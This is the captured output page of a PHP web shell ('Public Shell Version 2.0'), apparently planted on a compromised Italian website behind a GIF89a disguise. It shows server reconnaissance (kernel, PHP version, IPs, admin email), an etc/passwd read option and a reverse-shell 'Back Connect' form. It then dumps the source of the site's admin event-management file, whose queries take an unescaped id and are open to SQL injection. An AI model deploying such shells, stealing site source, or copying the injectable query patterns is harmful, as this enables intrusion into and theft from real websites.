GIF89a

Public Shell

Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt : '; Public Shell Version 2.0

Disable Functions: system,popen,dl,passthru,proc_open,shell_exec

Current Path : /web/htdocs/www.giancio.com/home/admin/function/

Current File : /web/htdocs/www.giancio.com/home/admin/function/event.php

<?php //////////////////////////EVENTI function listae() { global $conn, $id; $output = '<span class="left"><h1 class="left">' . LISTA . ' Eventi</h1>    <a class="right button" href="?azione=inseriscie">' . ADD . ' »</a></span><span class="right">'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resulte" method="post">'; $output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>'; $output .= '  <input type="submit" value="' . CERCA . '" id="myButton"/>'; $output .= '</form></span>'; $output .= '<div id="show" class="clear">'; $output .= '<table cellspacing="0" width="100%" align="center">'; $output .= '<tr> <th>' . DATA . '</th> <th>' . TITOLO . '</th> <th>Location</th> <th>' . DESC . '</th> <th></th> <th></th></tr>'; $sql = 'select * from event order by ev_data DESC '; $dati = mysql_query($sql, $conn) or die(mysql_error()); while ($array = mysql_fetch_array($dati)) { $g = substr($array['ev_data'], 8, 2); $m = substr($array['ev_data'], 5, 2); $a = substr($array['ev_data'], 0, 4); $data = $g . '-' . $m . '-' . $a; $output .= '<tr>'; $output .= '<td>' . $data . '</td>'; $output .= '<td>' . $array['ev_titolo'] . '</td>'; $output .= '<td>' . $array['ev_loc'] . '</td>'; $output .= '<td>' . $array['ev_desc'] . '</td>'; $output .= '<td align="center"><a class="right modifica show-option" title="' . MOD . '" href="?azione=modificae&id=' . $array['ev_id'] . '"></a></td>'; $output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminae&id=' . $array['ev_id'] . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>'; $output .= '</tr>'; } $output .= '</table></div><br /><br />'; return ($output); } function resulte() { global $conn, $id; $result = mysql_real_escape_string($_POST['ricerca']); $output = '<span class="left"><h1 class="left">' . LISTA . ' Eventi</h1>    <a class="right button" href="?azione=inseriscie">' . ADD . ' »</a></span><span class="right">'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resulte" method="post">'; $output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>'; $output .= '  <input type="submit" value="' . CERCA . '" id="myButton"/>'; $output .= '</form></span>'; $output .= '<div id="show" class="clear">'; $output .= '<table cellspacing="0" width="100%" align="center">'; $output .= '<tr> <th>' . DATA . '</th> <th>' . TITOLO . '</th> <th>Location</th> <th>Descrizione</th> <th></th> <th></th></tr>'; $sql = 'select * from event where ev_titolo like \'%' . $result . '%\' order by ev_data DESC '; $dati = mysql_query($sql, $conn) or die(mysql_error()); if(mysql_num_rows($dati)>0){ while ($array = mysql_fetch_array($dati)) { $g = substr($array['ev_data'], 8, 2); $m = substr($array['ev_data'], 5, 2); $a = substr($array['ev_data'], 0, 4); $data = $g . '-' . $m . '-' . $a; $output .= '<tr>'; $output .= '<td>' . $data . '</td>'; $output .= '<td>' . $array['ev_titolo'] . '</td>'; $output .= '<td>' . $array['ev_loc'] . '</td>'; $output .= '<td>' . $array['ev_desc'] . '</td>'; $output .= '<td align="center"><a class="right modifica show-option" title="' . MOD . '" href="?azione=modificae&id=' . $array['ev_id'] . '"></a></td>'; $output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminae&id=' . $array['ev_id'] . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>'; $output .= '</tr>'; } $output .= '</table></div><br /><br />'; } else{ $output .= '<tr>'; $output .= '<td colspan="4">Nessun risultato</td>'; $output .= '</tr>'; $output .= '</table><br /><br />'; $output .= '</div>'; } return ($output); } function inseriscie() { global $conn, $id; $sql = 'select * from event where ev_id="' . $id . '" '; $dati_ev = mysql_query($sql) or die(mysql_error()); $array_ev = mysql_fetch_array($dati_ev); $output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvae&id=' . $id . '" method="post">'; $output .= '<h1>' . ADD . ' Evento</h1>'; $output .= '<a class="button" href="javascript:history.back()">' . BACK . '</a> <a class="show-option button" href="#" title="teeext">info »</a><br /><br />'; $output .= '<label for="miadata">' . DATA . '</label><br />'; $output .= '<input type="text" id="miadata" name="miadata" /><br />'; $output .= '<label for="titolo">' . TITOLO . '</label><br />'; $output .= '<input type="text" id="titolo" name="titolo" /><br />'; $output .= '<label for="location">Location</label><br />'; $output .= '<input type="text" id="lovation" name="location" /><br />'; $output .= '<label for="testo">' . TEXT . '</label><br />'; $output .= '<textarea id="testo" name="testo"></textarea><br /><br />'; $output .= '<input type="submit" value="' . SALVA . '" id="myButton"/><br /><br />'; $output .= '</fieldset>'; $output .= '</form>'; return ($output); } function modificae() { global $conn, $id; $sql = 'select * from event where ev_id="' . $id . '" '; $dati_ev = mysql_query($sql) or die(mysql_error()); $array_ev = mysql_fetch_array($dati_ev); $g = substr($array_ev['ev_data'], 8, 2); $m = substr($array_ev['ev_data'], 5, 2); $a = substr($array_ev['ev_data'], 0, 4); $data = $m . '/' . $g . '/' . $a; $output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvae&id=' . $id . '" method="post">'; $output .= '<h1>' . MOD . ' Evento</h1>'; $output .= '<a class="button" href="javascript:history.back()">' . BACK . '</a>&nbsp<a class="show-option button" href="#" title="teeeext">info »</a><br /><br />'; $output .= '<label for="miadata">' . DATA . '</label><br />'; $output .= '<input type="text" id="miadata" name="miadata" value="' . $data . '" /><br />'; $output .= '<label for="titolo">' . TITOLO . '</label><br />'; $output .= '<input type="text" id="titolo" name="titolo" value="' . $array_ev['ev_titolo'] . '" /><br />'; $output .= '<label for="titolo">Location</label><br />'; $output .= '<input type="text" id="location" name="location" value="' . $array_ev['ev_loc'] . '" /><br />'; $output .= '<label for="testo">' . TEXT . '</label><br />'; $output .= '<textarea id="testo" name="testo">' . $array_ev['ev_desc'] . '</textarea><br /><br />'; $output .= '<input type="submit" value="' . SALVA . '" id="myButton"/><br /><br />'; $output .= '</form>'; return ($output); } function salvae() { global $conn, $id; $errore = 0; $titolo = mysql_real_escape_string($_POST['titolo']); //$titolo = $_POST['titolo']; $testo = mysql_real_escape_string($_POST['testo']); $location = mysql_real_escape_string($_POST['location']); //$testo = $_POST['testo']; $miadata = $_POST['miadata']; // $prewiew=mysql_real_escape_string($_POST['upfile']); $g = substr($miadata, 3, 2); $m = substr($miadata, 0, 2); $a = substr($miadata, 6, 4); $data = $a . '-' . $m . '-' . $g . ' 00:00:00'; if ($errore == 0) { if ($id == 0) { $sql = 'insert into event (ev_titolo,ev_desc,ev_data,ev_loc) values("' . $titolo . '","' . $testo . '","' . $data . '","' . $location . '")'; $output = 'Record inserito.<br /><a href="index.php?azione=listan">Torna alla lista</a>'; mysql_query($sql, $conn) or die(mysql_error()); header('location: index.php?ins&azione=listan'); //restituisci messaggio di errore return ($output); $id = mysql_insert_id(); } else { $sql = 'update event set ev_titolo="' . $titolo . '", ev_desc="' . $testo . '", ev_data="' . $data . '", ev_loc="' . $location . '" where ev_id="' . $id . '" '; $output = 'Record aggiornato.<br /><a href="index.php?azione=listae&page=1">Torna alla lista</a>'; mysql_query($sql, $conn) or die(mysql_error()); header('location: index.php?agg&azione=listae'); } } else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>'; } return ($output); } function eliminae() { global $conn, $id; $sql = 'delete from event where ev_id="' . $id . '"'; mysql_query($sql) or die(mysql_error()); header('location: index.php?del&azione=listae'); //restituisci messaggio di errore $output = 'Record eliminato.<br /><a href="index.php?azione=listae&page=1">Torna alla lista</a>'; return ($output); } ?>

Public Shell Version 2.0